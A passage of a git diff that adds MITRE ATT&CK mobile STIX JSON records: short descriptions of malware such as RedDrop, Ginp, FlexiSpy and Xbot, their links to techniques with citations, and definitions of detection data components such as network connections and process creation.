@@ -0,0 +1,30 @@
+{
+ "type": "bundle",
+ "id": "bundle--50484108-4f2b-49a3-b566-e64ec1b2e7f5",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "relationship--ffddcabb-0f03-46ae-abd6-7ab94e91b055",
+ "type": "relationship",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "url": "https://www.wandera.com/reddrop-malware/",
+ "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018.",
+ "source_name": "Wandera-RedDrop"
+ }
+ ],
+ "modified": "2019-09-10T13:14:39.009Z",
+ "description": "[RedDrop](https://attack.mitre.org/software/S0326) captures live recordings of the device's surroundings.(Citation: Wandera-RedDrop)",
+ "relationship_type": "uses",
+ "source_ref": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381",
+ "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fff16b5e-49c2-45e2-8b3a-fd5f82c96dd9.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fff16b5e-49c2-45e2-8b3a-fd5f82c96dd9.json
new file mode 100644
index 0000000000000000000000000000000000000000..dad94e02215f8bf72ace313907557b1863816d99
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fff16b5e-49c2-45e2-8b3a-fd5f82c96dd9.json
@@ -0,0 +1,33 @@
+{
+ "type": "bundle",
+ "id": "bundle--9ae69822-6199-4b2c-b28b-69c57f547116",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "type": "relationship",
+ "id": "relationship--fff16b5e-49c2-45e2-8b3a-fd5f82c96dd9",
+ "created": "2020-04-08T15:51:25.149Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "ThreatFabric Ginp",
+ "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020.",
+ "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2023-04-05T17:30:28.587Z",
+ "description": "[Ginp](https://attack.mitre.org/software/S0423) can download the device\u2019s contact list.(Citation: ThreatFabric Ginp)",
+ "relationship_type": "uses",
+ "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b",
+ "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/tool/tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81.json b/cti-ATT-CK-v13.1/mobile-attack/tool/tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81.json
new file mode 100644
index 0000000000000000000000000000000000000000..30be72062f983e326f1a72c1640b1cecd32e2e4d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/tool/tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81.json
@@ -0,0 +1,59 @@
+{
+ "type": "bundle",
+ "id": "bundle--97131e09-4d17-4422-923c-6e5bdc54f062",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "labels": [
+ "tool"
+ ],
+ "x_mitre_platforms": [
+ "Android"
+ ],
+ "x_mitre_domains": [
+ "mobile-attack"
+ ],
+ "x_mitre_contributors": [
+ "Emily Ratliff, IBM"
+ ],
+ "x_mitre_aliases": [
+ "FlexiSpy"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81",
+ "type": "tool",
+ "created": "2019-09-04T15:38:56.070Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "external_id": "S0408",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0408"
+ },
+ {
+ "description": "K. Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. Retrieved September 10, 2019.",
+ "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf",
+ "source_name": "FortiGuard-FlexiSpy"
+ },
+ {
+ "source_name": "CyberMerchants-FlexiSpy",
+ "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html",
+ "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019."
+ },
+ {
+ "source_name": "FlexiSpy-Website",
+ "url": "https://www.flexispy.com/",
+ "description": "FlexiSpy. (n.d.). FlexiSpy. Retrieved September 4, 2019."
+ }
+ ],
+ "modified": "2019-10-14T18:08:28.349Z",
+ "name": "FlexiSpy",
+ "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) is sophisticated surveillanceware for iOS and Android. 
Publicly-available, comprehensive analysis has only been found for the Android version.(Citation: FortiGuard-FlexiSpy)(Citation: CyberMerchants-FlexiSpy)\n\n[FlexiSpy](https://attack.mitre.org/software/S0408) markets itself as a parental control and employee monitoring application.(Citation: FlexiSpy-Website)",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/tool/tool--da21929e-40c0-443d-bdf4-6b60d15448b4.json b/cti-ATT-CK-v13.1/mobile-attack/tool/tool--da21929e-40c0-443d-bdf4-6b60d15448b4.json
new file mode 100644
index 0000000000000000000000000000000000000000..dbd5c5565d4b5b11a7208ea3cb3f32b6a3ea109d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/tool/tool--da21929e-40c0-443d-bdf4-6b60d15448b4.json
@@ -0,0 +1,44 @@
+{
+ "type": "bundle",
+ "id": "bundle--f71c2f58-d4a1-4e14-b9fa-e0d45bc2b7a7",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-24T15:09:07.609Z",
+ "name": "Xbot",
+ "description": "[Xbot](https://attack.mitre.org/software/S0298) is an Android malware family that was observed in 2016 primarily targeting Android users in Russia and Australia. (Citation: PaloAlto-Xbot)",
+ "labels": [
+ "tool"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "mobile-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "tool",
+ "id": "tool--da21929e-40c0-443d-bdf4-6b60d15448b4",
+ "created": "2017-10-25T14:48:48.609Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0298",
+ "external_id": "S0298"
+ },
+ {
+ "source_name": "Xbot",
+ "description": "(Citation: PaloAlto-Xbot)"
+ },
+ {
+ "source_name": "PaloAlto-Xbot",
+ "description": "Cong Zheng, Claud Xiao and Zhi Xu. (2016, February 18). New Android Trojan \u201cXbot\u201d Phishes Credit Cards and Bank Accounts, Encrypts Devices for Ransom. Retrieved December 21, 2016.",
+ "url": "http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json
new file mode 100644
index 0000000000000000000000000000000000000000..7d81fe4d0b2b8c1bf78a17fe1b0cb51a10ec4f9f
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba.json
@@ -0,0 +1,25 @@
+{
+ "type": "bundle",
+ "id": "bundle--0278285a-6a54-465c-8d73-fad0bcb32805",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-20T20:18:06.745Z",
+ "name": "Network Connection Creation",
+ "description": "Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.1",
+ "type": "x-mitre-data-component",
+ "id": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json
new file mode 100644
index 0000000000000000000000000000000000000000..29c702b526278790975c57a8d7af62d0bbb1935d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--2dfe1862-e2e4-4755-a6b0-e97b3c1a3157",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.274Z",
+ "name": "Network Traffic Content",
+ "description": "Logged network traffic data showing both protocol header and body values (ex: PCAP)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json
new file mode 100644
index 0000000000000000000000000000000000000000..22ab05d16e36f080c2fd7d498e9e9950cba52990
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json
@@ -0,0 +1,25 @@
+{
+ "type": "bundle",
+ "id": "bundle--21875d58-4868-4d63-bd7d-fca721caf4f8",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-07T16:15:56.932Z",
+ "name": "Process Creation",
+ "description": "The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.1",
+ "type": "x-mitre-data-component",
+ "id": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6.json
new file mode 100644
index 0000000000000000000000000000000000000000..d9c88f869a93d3f0f8b3762e4bb7afd867ed9427
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--5194ca2c-f959-45f1-8583-75c6a758e5ab",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-13T20:48:14.540Z",
+ "name": "System Settings",
+ "description": "Settings visible to the user on the device",
+ "x_mitre_data_source_ref": "x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8",
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "mobile-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "type": "x-mitre-data-component",
+ "id": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
+ "created": "2023-03-13T20:48:14.540Z",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962.json
new file mode 100644
index 0000000000000000000000000000000000000000..6fbbfac6e326117981c2f106ae4e5d4d356065e4
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--72b54462-4fc8-46ae-b018-773e49d92436",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-13T19:59:14.491Z",
+ "name": "API Calls",
+ "description": "API calls utilized by an application that could indicate malicious activity",
+ "x_mitre_data_source_ref": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203",
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "mobile-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "type": "x-mitre-data-component",
+ "id": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962",
+ "created": "2023-03-13T19:59:14.491Z",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json
new file mode 100644
index 0000000000000000000000000000000000000000..91461a318709e5d098cefa9236b4a82b7f8a376b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--80d3bbdb-522c-4eaf-a37b-5882eda4a6e3",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.272Z",
+ "name": "Process Termination",
+ "description": "Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json
new file mode 100644
index 0000000000000000000000000000000000000000..7da1cdf13274379cc54ae1bc3bf2214318489ed7
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0.json
@@ -0,0 +1,25 @@
+{
+ "type": "bundle",
+ "id": "bundle--79345f19-b05b-4014-844d-7c2e85fc52d5",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-07T16:14:39.124Z",
+ "name": "Command Execution",
+ "description": "The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )",
+ "x_mitre_data_source_ref": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.1",
+ "type": "x-mitre-data-component",
+ "id": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2.json
new file mode 100644
index 0000000000000000000000000000000000000000..9f383dc393650c9df6d215fd8360a875755d1707
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--61cce305-4a82-496f-b88d-67941367e5c6",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-13T20:00:38.029Z",
+ "name": "Protected Configuration",
+ "description": "Device configuration options that are not typically utilized by benign applications",
+ "x_mitre_data_source_ref": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203",
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "mobile-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "type": "x-mitre-data-component",
+ "id": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
+ "created": "2023-03-13T20:00:38.029Z",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0.json
new file mode 100644
index 0000000000000000000000000000000000000000..0cf8a370e792c59840c98f539afa988344baf67d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--f7176a61-17fe-43e1-b7dd-2a062b8b5630",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-13T19:59:42.141Z",
+ "name": "Network Communication",
+ "description": "Network requests made by an application or domains contacted",
+ "x_mitre_data_source_ref": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203",
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "mobile-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "type": "x-mitre-data-component",
+ "id": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0",
+ "created": "2023-03-13T19:59:42.141Z",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6.json
new file mode 100644
index 0000000000000000000000000000000000000000..56153d709f98c10fb5fbbf44901dbdc4e5d17b66
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6.json
@@ -0,0 +1,25 @@
+{
+ "type": "bundle",
+ "id": "bundle--88ea97e1-255d-4229-862a-d92f593a12a0",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-20T20:22:45.613Z",
+ "name": "Host Status",
+ "description": "Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.1",
+ "type": "x-mitre-data-component",
+ "id": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json
new file mode 100644
index 0000000000000000000000000000000000000000..c098cbde4b434671304a36e1e6e3385973531290
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--70735986-4548-4cb1-9bda-21d93912f89d", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Flow", + "description": "Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43.json new file mode 100644 index 0000000000000000000000000000000000000000..6a1e2dd8d78fec646e1c5260f35ed5720a2a97b0 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43.json 
@@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--b8f0a1a2-b1f2-4ff0-a1ed-b2aafb713385", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-13T20:00:08.487Z", + "name": "Permissions Requests", + "description": "Permissions declared in an application's manifest or property list file", + "x_mitre_data_source_ref": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "created": "2023-03-13T20:00:08.487Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4.json new file mode 100644 index 0000000000000000000000000000000000000000..d5d0e9990c99bde7bb8d79be5aee2417006a06cb --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4.json 
